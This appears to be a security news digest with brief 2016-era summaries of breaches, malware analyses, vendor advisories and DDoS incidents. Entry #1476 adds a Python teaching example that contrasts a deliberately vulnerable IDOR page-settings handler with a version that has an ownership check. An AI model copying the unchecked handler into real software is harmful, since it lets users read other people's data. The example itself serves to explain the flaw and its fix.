#1483 324,000 payment cards breached, CVVs included
About two months ago, a Twitterer going by 0x2Taylor announced a sizeable data dump.

More than 300,000 credit card records were uploaded to the file sharing service Mega; the data has since been removed from Mega, but not before it was widely downloaded by many interested parties.

By some standards, 300,000 stolen records doesn’t sound like very many these days.

That’s a sad state of affairs, of course, caused by the daunting size of some high-profile attacks that have hit the news recently.
#1482 Fake AV makes it onto Google Play
Every once in a while, a fake antivirus pops up on the Google Play store. Most of the time, it’s just a fake scanner that doesn’t detect anything because it doesn’t actually look for anything to detect. Show a scan that simply lists all the apps on your device and it’s pretty easy to look legit. They serve up some ads for revenue, and you are given the false sense your phone isn’t infected—kind of a win-win unless you actually want malicious apps to be detected/removed.

These apps are often ignored by real AV scanners because, technically, they aren’t doing anything malicious. It’s only when malicious intent is found that these apps are classified as bad.

With a clean design and look, Antivirus Free 2016 could very easily be confused for a legitimate AV scanner.
#1481 Cisco IOS Software Checker
Use the Cisco IOS Software Checker tool to search for Cisco Security Advisories that apply to specific Cisco IOS and IOS XE Software releases and have a Security Impact Rating (SIR) of Critical or High. Note that the tool does not provide information about security advisories that have a SIR of Medium. In addition, the tool does not support Cisco IOS XR Software or interim builds of Cisco IOS Software.

To use the tool, choose a release from the drop-down list, enter the output of the show version command, or upload a text file that lists specific releases.
#1480 Untangling the Ripper ATM malware
Last August, security researchers released a blog post discussing a new ATM malware family called Ripper which they believe was involved in the recent ATM attacks in Thailand. Large numbers of ATMs were also temporarily shut down as a precautionary measure.

That analysis gave an overview of the techniques used by the malware, the fact that it targets three major ATM vendors, and compared Ripper to previous ATM malware families. Their analysis was based on the file with MD5 hash 15632224b7e5ca0ccb0a042daf2adc13. This file was uploaded to Virustotal by a user in Thailand on August 23.

During our analysis we noticed some additional details that were not called out, or which appear to contradict this earlier analysis. We highlight these differences in this blog post. We have also included technical indicators such as code offsets where possible for other researchers to follow on from our work.

In April of this year, Trend Micro’s Forward Looking Threat Research team and Europol EC3 collaborated on a comprehensive report on all ATM malware threats known at that point. We have been watching out for new families since then. The paper was made available to members of the Financial and Law Enforcement communities. If you are part of these industries, have not received a copy, and would like one, please contact Robert McArdle.
#1479 Ransomware's next target: Your car and your home
Ransomware is perhaps the biggest cybersecurity scourge of 2016, becoming increasingly problematic both for individuals and businesses of all sizes.

The concept is simple: the cybercriminal will trick a victim into opening a malicious file or a clicking on a link which causes their computer, tablet, or smartphone to be infected with malware that encrypts the data stored on the device. The cybercriminal then demands the victim pay a ransom -- often in Bitcoin -- in order to get their systems unlocked.

Unless the ransomware also installs data-stealing malware on your system, getting infected with ransomware is more an annoyance than anything. Yes, a business will lose money while its networks are locked down, but in most cases it doesn't have any further 'real world' consequences, as the theft of personal data or banking information might.
#1478 Cisco warns of second firewall bug exposed by Shadow Brokers
Cisco is scrambling to patch another vulnerability in many of its products that was exposed as part of the Shadow Brokers dump last month. The latest vulnerability affects many different products, including all of the Cisco PIX firewalls.

The latest weakness lies in the code that Cisco’s IOS operating system uses to process IKEv1 packets. IKE is used in the IPSec protocol to help set up security associations, and Cisco uses it in a number of its products. The company said in an advisory that many versions of its IOS operating system are affected, including IOS XE and XR.

“A vulnerability in IKEv1 packet processing code in Cisco IOS, Cisco IOS XE and Cisco IOS XR Software could allow an unauthenticated, remote attacker to retrieve memory contents, which could lead to the disclosure of confidential information,” the advisory says.
#1477 Mozilla patching Firefox certificate pinning vulnerability
Mozilla is expected tomorrow to patch a critical vulnerability in Firefox’s automated update process for extensions that should put the wraps on a confusing set of twists surrounding this bug. The flaw also affected the Tor Browser and was patched Friday by the Tor Project.

The vulnerability first saw light of day last week when a researcher who goes by the handle movrck published his disclosure. He said that a resourced attacker with the ability to steal or forge a TLS certificate for addons.mozilla.org could put the entire Tor (and Firefox) ecosystem at risk of compromise.
#1476 Facebook page takeover – zero-day vulnerability
Insecure Direct Object References occur when an application provides direct access to objects based on user-supplied input. As a result of this vulnerability attackers can bypass authorization and access resources in the system directly, for example database records or files.

Insecure Direct Object References allow attackers to bypass authorization and access resources directly by modifying the value of a parameter used to directly point to an object. Such resources can be database entries belonging to other users, files in the system, and more. This is caused by the fact that the application takes user supplied input and uses it to retrieve an object without performing sufficient authorization checks.
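The two paragraphs above describe the class of bug in the abstract. As an added illustration (this is example code, not the disclosed Facebook bug or the researcher's own proof of concept), the block below shows a page-settings lookup that trusts a user-supplied page id as-is, next to the same lookup scoped to the logged-in user. The page store, user ids and `simulate_request` router are constructed for the example.

```python
# Added example (not from the original post): an insecure direct object reference
# in a page-lookup handler, beside the same handler with an authorization check.
# All data below is constructed for illustration.

from dataclasses import dataclass
from typing import Optional

@dataclass(frozen=True)
class Page:
    page_id: int
    owner_id: int          # the user account that administers this page
    title: str
    settings: dict

# Constructed "database": two pages owned by two different users.
PAGES = {
    101: Page(101, owner_id=1, title="Alice's Bakery", settings={"email": "alice@example.invalid"}),
    202: Page(202, owner_id=2, title="Bob's Garage",   settings={"email": "bob@example.invalid"}),
}

class AuthorizationError(Exception):
    """Raised when the caller is authenticated but not permitted to reach the object."""

def get_page_settings_vulnerable(session_user_id: int, page_id: int) -> Optional[dict]:
    """IDOR: the page id comes straight from the request and is used to fetch
    the object; nothing ties the object back to the logged-in user."""
    page = PAGES.get(page_id)
    return page.settings if page else None

def get_page_settings_checked(session_user_id: int, page_id: int) -> Optional[dict]:
    """Hardened form: the lookup is bound to the caller's identity, so a guessed
    or tampered id for someone else's page is refused."""
    page = PAGES.get(page_id)
    if page is None:
        return None
    if page.owner_id != session_user_id:
        raise AuthorizationError(f"user {session_user_id} does not own page {page_id}")
    return page.settings

def simulate_request(handler, session_user_id: int, page_id: int) -> str:
    """Drive a handler the way a request router would and map the outcome to
    an HTTP-style status so both behaviours can be compared side by side."""
    try:
        result = handler(session_user_id, page_id)
    except AuthorizationError:
        return "403 Forbidden"
    return "200 OK" if result is not None else "404 Not Found"

if __name__ == "__main__":
    # User 1 changes the page_id parameter to point at user 2's page.
    print("vulnerable:", simulate_request(get_page_settings_vulnerable, 1, 202))  # 200 OK: data leaks
    print("checked:   ", simulate_request(get_page_settings_checked, 1, 202))     # 403 Forbidden
```

The check belongs in the data-access layer (or in a query that filters by owner) rather than in each individual view, so that a newly added endpoint cannot forget it. Whether a denied request returns 403 or a 404 indistinguishable from a missing page is a separate design choice; the latter avoids confirming that the object exists.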
#1475 Blizzard hit with DDoS attack disrupting play for gamers
Blizzard Entertainment was hit with a denial-of-service attack on Sunday that knocked its Battle.net servers offline.

"We are currently monitoring a DDOS attack against network providers which is affecting latency/connections to our games," Blizzard wrote in a tweet.

Battle.net runs many of Blizzard's popular games, including Overwatch, World of Warcraft, Hearthstone: Heroes of Warcraft, and more.
#1474 IKEv1 information disclosure vulnerability in multiple Cisco products
A vulnerability in IKEv1 packet processing code in Cisco IOS, Cisco IOS XE and Cisco IOS XR Software could allow an unauthenticated, remote attacker to retrieve memory contents, which could lead to the disclosure of confidential information.

The vulnerability is due to insufficient condition checks in the part of the code that handles IKEv1 security negotiation requests. An attacker could exploit this vulnerability by sending a crafted IKEv1 packet to an affected device configured to accept IKEv1 security negotiation requests. A successful exploit could allow the attacker to retrieve memory contents, which could lead to the disclosure of confidential information.

Cisco will release software updates that address this vulnerability. There are no workarounds that address this vulnerability.
#1473 Mozilla plans Firefox fix for same malware vulnerability that bit Tor
Mozilla officials say they'll release a Firefox update on Tuesday that fixes the same cross-platform, malicious code-execution vulnerability patched Friday in the Tor browser.

The vulnerability allows an attacker who has a man-in-the-middle position and is able to obtain a forged certificate to impersonate Mozilla servers, Tor officials warned in an advisory. From there, the attacker could deliver a malicious update for NoScript or many other Firefox extensions installed on a targeted computer. The fraudulent certificate would have to be issued by any one of several hundred Firefox-trusted certificate authorities (CAs).

While it probably would be challenging to hack a CA or trick one into issuing the necessary certificate for addons.mozilla.org, such a capability is well within reach of nation-sponsored attackers, who are precisely the sort of adversaries included in the Tor threat model. In 2011, for instance, hackers tied to Iran compromised Dutch CA DigiNotar and minted counterfeit certificates for more than 200 addresses, including Gmail and the Mozilla addons subdomain.
#1472 ORWL PC: The most secure home computer ever
We’ve all heard tales of foreign intelligence entities breaking into hotel rooms and cloning a person’s hard drive while he or she is in the bar downstairs.

You might dismiss it as the stuff of urban legend or Jason Bourne movies, but this style of attack does highlight one of the most basic weaknesses of today’s PCs: their data is extremely vulnerable once an attacker has physical access to a machine. Cold boot attacks, USB exploits, or DMA attacks over FireWire, among other breaches, are all possible if a bad actor can get his or her hands on the hardware.
#1471 Structure Security: How much security can you automate?
Security talent is hard to find and enterprises are falling over each other to hire people to defend their infrastructure, applications and data.

Meanwhile, universities are adding cybersecurity programs, but not at a pace that'll make much of a dent in the talent shortage.

Can artificial intelligence and automation help the security cause?

Most likely. The security intersection between artificial intelligence, automation and the labor pool will be front and center at the Structure Security conference kicking off next Tuesday, Sept. 27. I'm moderating a talk with Jay Leek, Chief Information Security Officer at Blackstone, the massive private equity firm.
#1470 Fooling the ‘Smart City’
The concept of a smart city involves bringing together various modern technologies and solutions that can ensure comfortable and convenient provision of services to people, public safety, efficient consumption of resources, etc. However, something that often goes under the radar of enthusiasts championing the smart city concept is the security of smart city components themselves. The truth is that a smart city’s infrastructure develops faster than security tools do, leaving ample room for the activities of both curious researchers and cybercriminals.
#1469 Someone is learning how to take down the Internet
Over the past year or two, someone has been probing the defenses of the companies that run critical pieces of the Internet. These probes take the form of precisely calibrated attacks designed to determine exactly how well these companies can defend themselves, and what would be required to take them down. We don't know who is doing this, but it feels like a large nation state. China and Russia would be my first guesses.

First, a little background. If you want to take a network off the Internet, the easiest way to do it is with a distributed denial-of-service attack (DDoS). Like the name says, this is an attack designed to prevent legitimate users from getting to the site. There are subtleties, but basically it means blasting so much data at the site that it's overwhelmed. These attacks are not new: hackers do this to sites they don't like, and criminals have done it as a method of extortion. There is an entire industry, with an arsenal of technologies, devoted to DDoS defense. But largely it's a matter of bandwidth. If the attacker has a bigger fire hose of data than the defender has, the attacker wins.
#1468 BkSoD by ransomware: HDDCryptor uses commercial tools to encrypt network shares and lock HDDs
While most ransomware we’ve seen only targets specific file types or folders stored on local drives, removable media and network shares, we were able to uncover a ransomware family that does not discriminate: HDDCryptor. Detected as Ransom_HDDCRYPTOR.A, HDDCryptor not only targets resources in network shares such as drives, folders, files, printers, and serial ports via Server Message Block (SMB), but also locks the drive. Such a damaging routine makes this particular ransomware a very serious and credible threat not only to home users but also to enterprises.
#1467 Pay-to-click ad service hacked, 6.6M plaintext passwords dumped
How would you like to earn money just by sitting at home in front of a computer and viewing ads?

Us neither.

What if you could earn $1.20 an hour?

We’re not sure how you’d manage to cover the costs of your internet connection at that rate, but if you could somehow get online for free, and you were ready to work a solid 12 hours a day, 7 days a week, you could get out with close to $6000 a year.

In many parts of the world, that’s serious money, so we’re not surprised that people are willing to do it.

One online service that will pay you at that sort of rate is a company called ClixSense, which basically pays you for viewing ads, completing online surveys, categorising images or videos, making Google searches, and so on.

ClixSense also runs an affiliate network, so you can earn commission on the earnings of new members whom you bring to the party, as a way of keeping the ClixSense click-machine fuelled with clickers.
#1466 Cisco patches critical WebEx meetings server vulnerability
Cisco warned customers of 12 vulnerabilities across its product line this week, including a critical vulnerability in the software that powers its conferencing product, WebEx Meetings Server.

The company stressed on Wednesday that version 2.6 of its WebEx Meetings Server is vulnerable to a remote command execution vulnerability. If exploited, the bug could enable an attacker to inject arbitrary commands on a system with elevated privileges.

The issue, the most pressing among all the fixes pushed by Cisco this week, stems from the insufficient sanitization of user-supplied data, according to an advisory published by the company on Wednesday. U.S. CERT also published an alert today with links to all 12 Cisco advisories.
#1465 Signal bug lets attackers tamper with encrypted messages—patch now
Signal, the mobile messaging app recommended by NSA leaker Edward Snowden and a large number of security professionals, just fixed a bug that allowed attackers to tamper with the contents of encrypted messages sent by Android users.

The authentication-bypass vulnerability was one of two weaknesses found by researchers Jean-Philippe Aumasson and Markus Vervier in an informal review of the Java code used by the Android version of Signal. The bug made it possible for attackers who compromised a Signal server or were otherwise able to monitor data passing between Signal users to replace a valid attachment with a fraudulent one. A second bug possibly would have allowed attackers to remotely execute malicious code, but a third bug limited exploits to a simple remote crash.

"The results are not catastrophic, but show that, like any piece of software, Signal is not perfect," Aumasson wrote in an e-mail. "Signal drew the attention of many security researchers, and it's impressive that no vulnerability was ever published until today. This pleads in favor of Signal, and we'll keep trusting it."
#1464 Neverquest trojan gets big summer update
The once prolific bank Trojan Neverquest has received a major code revamp over the summer and is now armed with modifications that can more adeptly hijack a victim’s PC, inject code into webpages and steal credentials. The update represents a significant enough change to the malware that researchers have dubbed the latest samples Neverquest2.

Over the past several months Arbor Networks’ Security Engineering and Response Team (ASERT), along with other members of the security research community, has been tracking the slow and steady improvements added to Neverquest. There is consensus that the team behind the Trojan is gearing up for a new Neverquest2 assault.
#1463 Ransomware getting more targeted and expensive
I shared a meal not long ago with a source who works at a financial services company. The subject of ransomware came up and he told me that a server in his company had recently been infected with a particularly nasty strain that spread to several systems before the outbreak was quarantined. He said the folks in finance didn’t bat an eyelash when asked to authorize several payments of $600 to satisfy the Bitcoin ransom demanded by the intruders: After all, my source confessed, the data on one of the infected systems was worth millions — possibly tens of millions — of dollars, but for whatever reason the company didn’t have backups of it.

This anecdote has haunted me because it speaks volumes about what we can likely expect in the very near future from ransomware — malicious software that scrambles all files on an infected computer with strong encryption, and then requires payment from the victim to recover them.
#1462 DualToy Windows trojan attacks Android and iOS Devices
A Windows Trojan called DualToy has been discovered that can side load malicious apps onto Android and iOS devices via a USB connection from an infected computer.

Researchers from Palo Alto Networks said DualToy has been in existence since January 2015, and it originally was limited to installing unwanted apps and displaying mobile ads on Android devices. About six months later, the Trojan morphed and began targeting iOS devices by installing a third-party App Store in hopes of nabbing iTunes usernames and passwords.

“When DualToy began to spread in January 2015, it was only capable of infecting Android devices… We observed the first sample of DualToy capable of infecting iOS devices on June 7, 2015. Later in 2016, a new variant appeared,” wrote senior malware researcher Claud Xiao in a technical description of the Trojan.
#1461 Google is giving you $200,000 to hack the Nexus 6P and 5X
If you’ve always wanted to get into hacking, now’s the time.

Today Google is launching the Project Zero Security Contest and awarding over $300,000 in prizes to anyone who can hack Nexus 6P and 5X knowing only the devices’ phone number and email address.
#1460 Hackers found 47 new vulnerabilities in 23 IoT devices at DEF CON
Smart door locks, padlocks, thermostats, refrigerators, wheelchairs and even solar panel arrays were among the internet-of-things devices that fell to hackers during the IoT Village held at the DEF CON security conference in August.

A month after the conference ended, the results are in: 47 new vulnerabilities affecting 23 devices from 21 manufacturers were disclosed during the IoT security talks, workshops and onsite hacking contests.

The types of vulnerabilities found ranged from poor design decisions like the use of plaintext and hard-coded passwords to coding flaws like buffer overflows and command injection.

Door locks and padlocks from vendors like Quicklock, iBlulock, Plantraco, Ceomate, Elecycle, Vians, Lagute, Okidokeys and Danalock were found to be vulnerable to password sniffing and replay attacks, where a captured command can be replayed later to open the locks.

A wheelchair from an unknown vendor had a vulnerability that could be exploited to disable a safety feature and take control of the device. A thermostat from Trane used a weak plain text protocol potentially allowing attackers to cause excessive heating, furnace failures or frozen water pipes by manipulating thermostat functionality.
#1459 iOS 10 security updates move to HTTPS
Apple has finally moved its iOS security update mechanism to HTTPS with today’s release of iOS 10.

Previously, updates were sent to devices over HTTP and attackers already present on a network could potentially intercept and manipulate updates.

“An issue existed in iOS updates, which did not properly secure user communications. This issue was addressed by using HTTPS for software updates,” Apple said in its advisory, adding that a man-in-the-middle attacker could block devices from receiving updates.
#1458 Microsoft patches 47 vulnerabilities with September Patch Tuesday
Microsoft patched 47 vulnerabilities as part of 14 security bulletins, seven critical, with its monthly Patch Tuesday updates today.

The company is warning users that if left unpatched, 10 of the issues can lead to remote execution.

The updates resolve issues in Microsoft Windows, Office, Office Service and Web Apps, Exchange, its Internet Explorer and Edge browsers and Adobe Flash Player.

Among the bugs fixed on Tuesday is a 10-year-old vulnerability, CVE-2016-0137, that existed in Detours, Microsoft Office’s hooking engine. The bug, disclosed over the summer and discussed in depth at Black Hat, affected a handful of antivirus platforms that use code hooking. The vulnerability allowed hackers to bypass exploit mitigations present in Windows and those third-party applications. Researchers at enSilo, who unearthed the bug, disclosed it to Microsoft nine months ago, prior to Black Hat. At the time the researchers warned that hundreds of thousands of users could be affected by the vulnerability.
#1457 UK: Government data security slammed in new report
The National Audit Office has issued a damning report of the UK government's approach to digital security.

The central teams and departments dedicated to protecting information were found to be operating without cohesion and governance.

There are 73 teams and 1,600 staff across government with data security responsibilities.

However, there was a lack of awareness among staff about who to contact for guidance, the NAO said.

"None of the departments we interviewed understood the specific roles of the various bodies involved, making it difficult to identify any single arbiter of standards or guidance," the report stated.
#1456 Secret Service warns of ‘Periscope’ skimmers
The U.S. Secret Service is warning banks and ATM owners about a new technological advance in cash machine skimming known as “periscope skimming,” which involves a specialized skimming probe that connects directly to the ATM’s internal circuit board to steal card data.

According to a non-public alert released to bank industry sources by a financial crimes task force in Connecticut, this is thought to be the first time periscope skimming devices have been detected in the United States. The task force warned that the devices may have the capability to remain powered within the ATM for up to 14 days and can store up to 32,000 card numbers before exhausting the skimmer’s battery strength and data storage capacity.

The alert documents the first known case of periscope skimming in the United States, discovered Aug. 19, 2016 at an ATM in Greenwich, Conn. A second periscope skimmer was reportedly found hidden inside a cash machine in Pennsylvania on Sept. 3.
#1455 Adblock Plus finds the end-game of its business model: Selling ads
Eyeo GmbH, the company that makes the popular Adblock Plus software, will today start selling the very thing many of its users hate—advertisements. Today, the company is launching a self-service platform to sell "pre-whitelisted" ads that meet its "acceptable ads" criteria. The new system will let online publishers drag and drop advertisements that meet Eyeo's expectations for size and labeling.

"The Acceptable Ads Platform helps publishers who want to show an alternative, nonintrusive ad experience to users with ad blockers by providing them with a tool that lets them implement Acceptable Ads themselves,” said Till Faida, co-founder of Adblock Plus.

Publishers who place the ads will do so knowing that they won't be blocked by most of the 100 million Adblock Plus users. The software extension's default setting allows for "acceptable ads" to be shown, and more than 90 percent of its users don't change that default setting.
#1454 Generic OSX malware detection method explained
When it comes to detecting OS X malware, the future may not be rooted in machine learning algorithms, but patterns and heatmap visualization, a researcher posits.

In an academic paper published by Virus Bulletin on Monday, Vincent Van Mieghem, a former student at the Delft University of Technology in the Netherlands, describes how a recurring pattern he observed in OS X system calls can be used to indicate the presence of malware.

Van Mieghem wrote the paper, “Behavioral Detection and Prevention of Malware on OS X,” (.PDF) while interning at Fox-IT but has since moved on to PricewaterhouseCoopers’ cybersecurity division.
#1453 Gugi: from an SMS trojan to a mobile-banking trojan
The mobile-banking Trojan family, Trojan-Banker.AndroidOS.Gugi is interesting due to its use of the WebSocket protocol to interact with its command-and-control servers. This protocol combines the advantages of HTTP with those of commonly used sockets: there is no need to open extra ports on a device, as all the communication goes through standard port 80. At the same time, real-time data exchange is possible.

It is worth noting that even though this technology is user-friendly, it is not that popular among attackers. Among all the mobile Trojans that utilize WebSocket technology, more than 90% are related to the Gugi family.
#1452 How a third-party App Store abuses Apple’s developer enterprise program to serve adware
For bogus applications to be profitable, they should be able to entice users into installing them. Scammers do so by riding on the popularity of existing applications, embedding them with unwanted content—even malicious payloads—and masquerading them as legitimate. These repackaged apps are peddled to unsuspecting users, mostly through third-party app stores.

Haima does exactly that, and more. We discovered this China-based third-party iOS app store aggressively promoting its repackaged apps on social network channels (YouTube, Facebook, Google+ and Twitter), banking on the popularity of games and apps such as Minecraft, Terraria and Instagram to lure users into downloading them.

Third-party app stores such as Haima rely on the trust misplaced not only by the users but also by distribution platforms such as Apple’s, whose Developer Enterprise Program is abused to deploy these repackaged apps. These marketplaces also appeal to the malefactors because they are typically less policed. Haima capitalizes on the monetization of ads that it unscrupulously pushes to its repackaged apps.
#1451 Hands-on: Blue Hydra can expose the all-too-unhidden world of Bluetooth
My new neighbor was using AirDrop to move some files from his phone to his iMac. I hadn't introduced myself yet, but I already knew his name. Meanwhile, someone with a Pebble watch was walking past, and someone named "Johnny B" was idling at the stoplight at the corner in their Volkswagen Beetle, following directions from their Garmin Nuvi. Another person was using an Apple Pencil with their iPad at a nearby shop. And someone just turned on their Samsung smart television.

I knew all this because each person advertised their presence wirelessly, either over "classic" Bluetooth or the newer Bluetooth Low Energy (BTLE) protocol—and I was running an open source tool called Blue Hydra, a project from the team at Pwnie Express. Blue Hydra is intended to give security professionals a way of tracking the presence of traditional Bluetooth, BTLE devices, and BTLE "iBeacon" proximity sensors. But it can also be connected to other tools to provide alerts on the presence of particular devices.
#1450 Allow web domain changeover: US tech firms
Major technology companies including Facebook, Google, and Twitter are urging United States Congress to support a plan for the government to cede control of the internet's technical management to the global community.

The US Commerce Department has primary oversight of the internet's management, but some Republican lawmakers are trying to block the handover to global stakeholders, which include businesses, tech experts, and public interest advocates, saying it could stifle online freedom by giving voting rights to authoritarian governments.

The years-long plan to transfer oversight of the non-profit Internet Corporation for Assigned Names and Numbers (ICANN) is scheduled to occur on October 1, unless Congress votes to block the handover. The California-based corporation operates the database for domain names such as .com and .net and their corresponding numeric addresses that allow computers to connect.
#1449 Critical MySQL vulnerability disclosed
A researcher has published details and a limited proof-of-concept exploit for a critical vulnerability in MySQL that has been patched by some vendors, but not yet by Oracle.

The vulnerability allows an attacker to remotely or locally exploit a vulnerable MySQL database and execute arbitrary code, researcher Dawid Golunski of Legal Hackers wrote today in an advisory.

The flaw affects MySQL 5.7.15, 5.6.33 and 5.5.52. It has already been patched in the MariaDB and PerconaDB forks of MySQL. Golunski said in his advisory that he reported the vulnerability to Oracle and the other affected vendors on July 29; MariaDB and PerconaDB patched their versions before the end of August. Since more than 40 days had passed and the two vendor fixes were public, he decided to disclose.
#1448 Fire drill knocks ING bank's data centre offline
A fire extinguisher test in a bank's data centre has gone wrong in an "unprecedented" manner, causing its cash machines, online banking operations and website to go offline.

For much of Saturday, ING's Romanian customers could not access their money.

The bank said the discharge of its gas-based fire suppression system had caused "unexpected" damage to its computer servers.

A report by Motherboard suggests that the equipment was too noisy.

A spokeswoman for ING was unable to confirm this detail.

But she did acknowledge the problem had lasted from 13:00 to 23:00 local time and the bank had been unable to explain the situation to customers as its own communications system had been affected.
#1447 Cisco’s network bugs are front and center in bankruptcy fight
Game of War: Fire Age, your typical melange of swords and sorcery, has been one of the top-grossing mobile apps for three years, accounting for hundreds of millions of dollars in revenue. So publisher Machine Zone was furious when the game’s servers, run by hosting company Peak Web, went dark for 10 hours last October. Two days later, Machine Zone fired Peak Web, citing multiple outages, and later sued.

Then came the countersuit. Peak Web argued in court filings that Machine Zone was voiding its contract illegally, because the software bug that caused the game outages resided in faulty network switches made by Cisco Systems, and according to Peak Web’s contract with Machine Zone, it wasn’t liable. In December, Cisco publicly acknowledged the bug’s existence—too late to help Peak Web, which filed for bankruptcy protection in June, citing the loss of Machine Zone’s business as the reason. The Machine Zone-Peak Web trial is slated for March 2017.
#1446 Now you can buy a USB stick that destroys anything in its path
For just a few bucks, you can pick up a USB stick that destroys almost anything that it's plugged into. Laptops, PCs, televisions, photo booths -- you name it.

Once a proof-of-concept, the pocket-sized USB stick now fits in any security tester's repertoire of tools and hacks, says the Hong Kong-based company that developed it. It works like this: when the USB Kill stick is plugged in, it rapidly charges its capacitors from the USB power supply and then discharges into the data lines, all in a matter of seconds.

On unprotected equipment, the device's makers say it will "instantly and permanently disable unprotected hardware".
#1445 Two critical bugs and more malicious apps make for a bad week for Android
It was a bad week for millions of Android phone users. Two critical vulnerabilities were disclosed but remain unpatched in a large percentage of devices, while, separately, malicious apps were downloaded as many as 2.5 million times from Google's official Play Marketplace.

The vulnerabilities, which are similar in severity to the Stagefright family of bugs disclosed last year, have been fixed in updates Google began distributing Tuesday. A large percentage of Android phones, however, aren't eligible to receive the fixes. Even those that do qualify don't receive them immediately (the September updates are currently not available as over-the-air downloads for either of the Nexus 5X devices in my household). That gives attackers crude blueprints for exploiting vulnerabilities that remain unpatched on millions of devices.
#1444 Re-thinking security fundamentals: How to move beyond the FUD
Around ten years ago, a new movement spread throughout computing: design thinking. It seems so obvious in hindsight, but the notion that the user experience presented by your product was something that had to be considered and prioritized at every step -- instead of layered on at the end -- was revolutionary at the time.

It's long past time for a similar type of movement: security thinking.

For far too long, security has been an afterthought in the product development process. Passwords are stored in plain text at companies with hundreds of millions of users; people have proven time and time again that they will click on a link that seems so obviously suspicious; the most common password is, well, "password"; and large companies with tons of internal and external applications focus on plugging holes in the walls while attackers parachute into their networks. These aren't technical challenges; they are cultural challenges born of the obsession to rush products to market in search of rapid growth, or to hire a passel of security consultants who recommend layers of security products that cost more every year.
#1443 Blue light has a dark side
Exposure to blue light at night, emitted by electronics and energy-efficient lightbulbs, is harmful to your health.

Until the advent of artificial lighting, the sun was the major source of lighting, and people spent their evenings in (relative) darkness. Now, in much of the world, evenings are illuminated, and we take our easy access to all those lumens pretty much for granted.

But we may be paying a price for basking in all that light. At night, light throws the body's biological clock—the circadian rhythm—out of whack. Sleep suffers. Worse, research shows that it may contribute to cancer, diabetes, heart disease, and obesity.
#1442 Cryptocurrency mining malware discovered targeting Seagate NAS hard drives
A malware variant named Mal/Miner-C (also known as PhotoMiner) is infecting Internet-exposed Seagate Central Network Attached Storage (NAS) devices and using them to infect connected computers to mine for the Monero cryptocurrency.

Miner-C, or PhotoMiner, appeared at the start of June 2016, when a report revealed how this malware was targeting FTP servers and spreading on its own to new machines thanks to worm-like features that attempted to brute-force other FTP servers using a list of default credentials.
#1441 MalwareMustDie spotted a new ELF trojan backdoor, which is now targeting IoT devices
Experts from MalwareMustDie analyzed in August samples of a particular ELF trojan backdoor, dubbed ELF Linux/Mirai, which is now targeting IoT devices. The malware takes its name from its binary, "mirai.*," and according to the experts several attacks have been detected in the wild.

ELF Linux/Mirai is very insidious: it is still undetected by many antivirus solutions, as confirmed by its very low detection ratio on the VirusTotal online scanning service.

“The reason for the lack of detection is because of the lack of samples, which are difficult to fetch from the infected IoT devices, routers, DVR or WebIP Camera, the Linux with Busybox binary in embedded platform, which is what this threat is aiming at,” states the analysis from the MalwareMustDie blog.
#1440 Wordpress urges users to update now to fix critical security holes
Wordpress is urging webmasters to update their CMS packages as quickly as possible to protect their domains from critical vulnerability exploits.

On Thursday, the content management system (CMS) provider released a security advisory alongside the latest version of Wordpress, 4.6.1. Now available, the update patches two serious security problems, a cross-site scripting vulnerability and a path traversal security flaw.

The XSS flaw, discovered by SumOfPwn researcher Cengiz Han back in July at the Summer of Pwnage bug bounty project, allows attackers to use a crafted image file, upload to Wordpress, and inject malicious JavaScript code into the software.
#1439 Picture perfect: CryLocker ransomware uploads user information as PNG files
Using legitimate sites for command-and-control (C&C) is a common way for malware to avoid rousing suspicion on the victim's network. While most ransomware sends the gathered information directly to its own C&C servers, some variants differ slightly. CuteRansomware, for instance, uses Google Docs to pass information from the infected system to the attackers.

One of the latest ransomware families, CryLocker (detected as RANSOM_MILICRY.A), does the same by taking advantage of Imgur, a free online image hosting site that allows users to upload and share photos to their contacts. During our monitoring of activities related to exploit kits, we spotted both Rig and Sundown distributing this threat.
#1438 WordPress update resolves XSS, path traversal vulnerabilities
WordPress is strongly encouraging users of the content management system to update to the most recent version, 4.6.1, released on Wednesday.

The update addresses two separate security issues, a cross-site scripting vulnerability and a path traversal vulnerability.

The XSS vulnerability, discovered by Cengiz Han Sahin, co-founder of Dutch software security firm Securify, could be executed via image filename.
#1437 Israeli online attack service ‘vDOS’ earned $600,000 in two years
vDOS — a “booter” service that has earned in excess of $600,000 over the past two years helping customers coordinate more than 150,000 so-called distributed denial-of-service (DDoS) attacks designed to knock Web sites offline — has been massively hacked, spilling secrets about tens of thousands of paying customers and their targets.

The vDOS database, obtained by KrebsOnSecurity.com at the end of July 2016, points to two young men in Israel as the principal owners and masterminds of the attack service, with support services coming from several young hackers in the United States.
#1436 Two-thirds of companies pay ransomware demands: But not everyone gets their data back
The majority of organisations which become infected by ransomware will give into the demands of cybercriminals for reasons ranging from the importance of the encrypted data to the perceived low costs of ransom payments.

However, some companies have discovered the hard way that cybercriminals are not to be trusted: many paid to have their files decrypted only to find that they never got their data back.

The figures on reactions to ransomware from Trend Micro come following a surge in cyberattacks using the file encrypting malicious software over the last year which has resulted in it becoming the largest threat to cybersecurity, as demonstrated by some cases of Locky infections against high-profile targets.
#1435 Google shuts down potentially massive Android bug
The Android ecosystem may have dodged another Stagefright-type of vulnerability.

Google’s monthly Android Security Bulletin released on Tuesday not only patched the remaining Quadrooter vulnerabilities, but also fixed another wide-ranging flaw that could allow an attacker to easily compromise—or at least brick—any Android device dating back to version 4.2.

The key to staving off another Stagefright is that yesterday’s patch features a complete overhaul of the offending jhead library, mitigating the possibility of recurring critical bugs, which, for example, continue to plague Mediaserver on an almost-monthly basis.
#1434 The missing piece – sophisticated OSX backdoor discovered
Back in January this year we found a new family of cross-platform backdoors for desktop environments. After the discovery of the binaries for Linux and Windows systems, we have now finally come across the OS X version of Mokes.A. It is written in C++ using Qt, a cross-platform application framework, and is statically linked to OpenSSL. This leads to a filesize of approx. 14MB.
#1433 This nasty Android malware tries to bully its way past Marshmallow security features
The battle between hackers and mobile security continues as cybercriminals attempt to find a way around the tighter app security introduced with Android 6.0.

Kaspersky Lab is warning of a modification to the Gugi banking trojan that tries to force its way past new Android 6.0 Marshmallow security features designed to block phishing and ransomware attacks.

The company said the malware pressures users into granting it the right to draw its own interface on top of those of genuine apps, to send and view SMS, to make calls, and more. Kaspersky said that between April and early August this year there was a ten-fold increase in its number of victims.
#1432 Million more devices sharing known private keys for HTTPS, SSH admin
Millions of internet-facing devices – from home broadband routers to industrial equipment – are still sharing well-known private keys for encrypting their communications.

This is according to research from SEC Consult, which said in a follow-up to its 2015 study on security in embedded systems that the practice of reusing widely known secrets is continuing unabated.

